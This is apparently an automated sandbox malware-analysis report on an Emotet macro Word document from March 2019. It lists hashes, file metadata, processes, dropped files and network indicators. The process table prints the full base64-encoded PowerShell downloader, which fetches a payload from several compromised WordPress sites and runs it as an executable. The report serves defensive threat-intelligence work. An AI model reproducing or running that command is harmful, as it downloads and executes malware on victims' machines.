analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

YLY34446818-757.doc

Full analysis: https://app.any.run/tasks/ce92551c-0369-41a6-a356-c32245968e76
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: March 22, 2019, 13:49:21
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Mar 22 07:55:00 2019, Last Saved Time/Date: Fri Mar 22 07:55:00 2019, Number of Pages: 1, Number of Words: 1, Number of Characters: 12, Security: 0
MD5:

C4251192C03629E1B75234736B2819C0

SHA1:

E836287803344D39A3E3FAB2FAEE897C6576C356

SHA256:

D521847D867FE5A9EC310B22C0EA21EA578D5C290AA94674AD8A0C6E6125D7EE

SSDEEP:

3072:w77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qzCpbzHORSvrlu0fFec49W:w77HUUUUUUUUUUUUUUUUUUUT52V3BbOa

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 464)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1524)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 1524)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 12
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 12
Words: 1
Pages: 1
ModifyDate: 2019:03:22 07:55:00
CreateDate: 2019:03:22 07:55:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: -
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
34
Monitored processes
2
Malicious processes
0
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
1524"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\YLY34446818-757.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
464powershell -e JABBAEIAQQBBAEQAMQBVAEcAPQAoACcASABVAFoAJwArACcAQQBVAEEAQQBYACcAKQA7ACQAQgBBAEEAQQBDAFoAQQA9ACYAKAAnAG4AZQB3AC0AJwArACcAbwBiAGoAJwArACcAZQBjAHQAJwApACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQARgBVAEQAeAB3AFUARABBAD0AKAAnAGgAdAAnACsAJwB0AHAAOgAvAC8AZgAnACsAJwByAGEAbgBvAHMAYgAnACsAJwBhACcAKwAnAHIAJwArACcAYgBlACcAKwAnAHIAcwBoAG8AcAAuACcAKwAnAGMAJwArACcAbwBtAC8AJwArACcAdwBwAC0AYwAnACsAJwBvAG4AJwArACcAdABlAG4AdAAvAHAAbAAnACsAJwB1ACcAKwAnAGcAaQBuAHMALwAnACsAJwBJAFUAaAAnACsAJwAxACcAKwAnAC8AQABoACcAKwAnAHQAdAAnACsAJwBwADoAJwArACcALwAvAGEAcgB0AG0AJwArACcAaQBrACcAKwAnAGgAYQBsAGMAJwArACcAaAB5AGsAJwArACcALgBjAG8AbQAnACsAJwAvAHcAcAAnACsAJwAtAGkAbgAnACsAJwBjAGwAJwArACcAdQBkAGUAcwAnACsAJwAvACcAKwAnAG0AWQBXADMALwAnACsAJwBAAGgAdAB0AHAAJwArACcAOgAvACcAKwAnAC8AYQByACcAKwAnAGUAeABjAGEAcgAnACsAJwBnAG8AJwArACcALgBjAG8AbQAvAHcAcAAnACsAJwAtAGkAbgBjAGwAdQBkAGUAJwArACcAcwAvAFEAQgAnACsAJwBjAGkALwBAAGgAdAB0AHAAOgAvACcAKwAnAC8AdQBpACcAKwAnAHQAYwBzAC4AJwArACcAYQAnACsAJwBjAG0ALgAnACsAJwBvACcAKwAnAHIAZwAvAHcAcAAtACcAKwAnAGMAbwBuAHQAZQBuAHQALwAnACsAJwBmAHEAUwBsACcAKwAnAHQALwAnACsAJwBAACcAKwAnAGgAdAB0ACcAKwAnAHAAJwArACcAOgAvAC8AJwArACcAYQBsACcAKwAnAHQAYQAnACsAJwByAGYAeAAuAGMAJwArACcAbwBtAC8AdwBvACcAKwAnAHIAJwArACcAZABwAHIAZQAnACsAJwBzACcAKwAnAHMALwB3AFEAWQB0ACcAKwAnAC8AJwApAC4AKAAnAFMAcABsACcAKwAnAGkAdAAnACkALgBJAG4AdgBvAGsAZQAoACcAQAAnACkAOwAkAGMAWABBAFgAYwBBAD0AKAAnAG0AUQBfACcAKwAnAF8AeAAnACsAJwBRAEcAVQAnACkAOwAkAGgAdwBrAEMARABVACAAPQAgACgAJwAzACcAKwAnADUANwAnACkAOwAkAGkARABYAEQAQQBBAEcAUQA9ACgAJwBRAHgAQQBfAFgAQQAnACsAJwBBACcAKwAnAEEAJwApADsAJAB0AFEAQgBBAEMAQQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAaAB3AGsAQwBEAFUAKwAoACcALgBlAHgAJwArACcAZQAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABaAEIAbwBRAEEAVQBRAFUAIABpAG4AIAAkAEYAVQBEAHgAdwBVAEQAQQApAHsAdAByAHkAewAkAEIAQQBBAEEAQwBaAEEALgAoACcARABvAHcAbgBsAG8AYQBkACcAKwAnAEYAaQBsACcAKwAnAGUAJwApAC4ASQBuAHYAbwBrAGUAKAAkAFoAQgBvAFEAQQBVAFEAVQAsACAAJAB0AFEAQgBBAEMAQQApADsAJABBAGsAQgBBAFEAQQBHAEcAPQAoACcAawAnACsAJwBfAEEAWgBBAEEAJwArACcARAAnACkAOwBJAGYAIAAoACgAJgAoACcARwBlAHQAJwArACcALQAnACsAJwBJAHQAZQBtACcAKQAgACQAdABRAEIAQQBDAEEAKQAuACIAbABFAG4ARwBgAFQAaAAiACAALQBnAGUAIAA0ADAAMAAwADAAKQAgAHsALgAoACcASQAnACsAJwBuAHYAJwArACcAbwBrAGUALQBJAHQAJwArACcAZQBtACcAKQAgACQAdABRAEIAQQBDAEEAOwAkAFAAQQBBAG8AeABBAFEAQgA9ACgAJwBNAG8AbwAnACsAJwBYAFgAVQAnACsAJwBaAHcAJwApADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAHIAdwBjAEIARwBrAEIAPQAoACcASABDACcAKwAnAEMAQQBBAG8AWgAnACkAOwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 345
Read events
881
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
3

Dropped files

PID
Process
Filename
Type
1524WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR88AF.tmp.cvr
MD5:
SHA256:
464powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JC0SRUSAR4F84ALOC165.temp
MD5:
SHA256:
464powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFf9292.TMPbinary
MD5:7100C9D54A32DFE02751A9E1BC41F804
SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C
464powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:7100C9D54A32DFE02751A9E1BC41F804
SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C
1524WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$Y34446818-757.docpgc
MD5:3B7F3F2069A357113842349F975CE53C
SHA256:831ADAA73D2B4A74B3E922BDA9BCA5112550658851440E29179E4E9A52B97CFD
1524WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:3E4DE8133CC5918CBF7EA9A2EB3877A6
SHA256:56D555C2BE24B7BB602E6761F5B722A56323E272B476AF2D619CB638D1BB9263
1524WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:C5A97215604B7D51D58E4643AA25396F
SHA256:EE7AFB0C6890A7B7FCB2F4CFF23804EB196200D4157FAB0722734C7EDCDE62A2
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
5
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
464
powershell.exe
GET
404
89.184.94.112:80
http://artmikhalchyk.com/wp-includes/mYW3/
UA
xml
345 b
suspicious
464
powershell.exe
GET
404
64.41.83.139:80
http://altarfx.com/wordpress/wQYt/
US
xml
345 b
malicious
464
powershell.exe
GET
404
171.22.26.34:80
http://arexcargo.com/wp-includes/QBci/
GB
xml
345 b
suspicious
464
powershell.exe
GET
404
167.99.187.243:80
http://franosbarbershop.com/wp-content/plugins/IUh1/
US
xml
345 b
suspicious
464
powershell.exe
GET
404
162.254.252.104:80
http://uitcs.acm.org/wp-content/fqSlt/
US
xml
345 b
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
464
powershell.exe
167.99.187.243:80
franosbarbershop.com
US
suspicious
464
powershell.exe
171.22.26.34:80
arexcargo.com
GB
suspicious
464
powershell.exe
89.184.94.112:80
artmikhalchyk.com
Internet Invest Ltd.
UA
suspicious
464
powershell.exe
64.41.83.139:80
altarfx.com
Affinity Internet, Inc
US
malicious
464
powershell.exe
162.254.252.104:80
uitcs.acm.org
A2 Hosting, Inc.
US
suspicious

DNS requests

Domain
IP
Reputation
franosbarbershop.com
  • 167.99.187.243
suspicious
artmikhalchyk.com
  • 89.184.94.112
suspicious
arexcargo.com
  • 171.22.26.34
suspicious
uitcs.acm.org
  • 162.254.252.104
suspicious
altarfx.com
  • 64.41.83.139
malicious

Threats

No threats detected
No debug info